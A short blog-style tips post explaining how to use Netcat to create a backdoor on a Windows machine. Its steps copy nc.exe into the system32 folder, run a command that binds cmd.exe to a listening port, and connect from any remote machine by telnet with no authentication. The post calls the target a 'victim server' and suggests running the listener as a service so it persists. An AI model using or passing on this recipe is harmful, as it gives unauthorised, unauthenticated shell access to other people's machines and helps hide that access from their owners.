- 15
- Jan
image by destinelee
Netcat is referred to as the TCP/IP swiss army knife. Netcat can be used for good things, as well as bad. By using Netcat we can create a back door to any Windows machine with ease.
- Download the Windows version of Netcat.
- Unzip nc.exe to the %SYSTEMROOT%\system32 directory.
- Execute nc -d -L -e cmd.exe -p 10001. Change 10001 to which ever port you wish.
- From any remote machine accessible to the victim server — you can now telnet to the server on port 10001 — telnet X.X.X.X 10001 — without any authentication.
NOTE: As soon as you disconnect netcat will stop running. You might look into running it as a service.
Have any more Netcat tips? Please share in the comments.


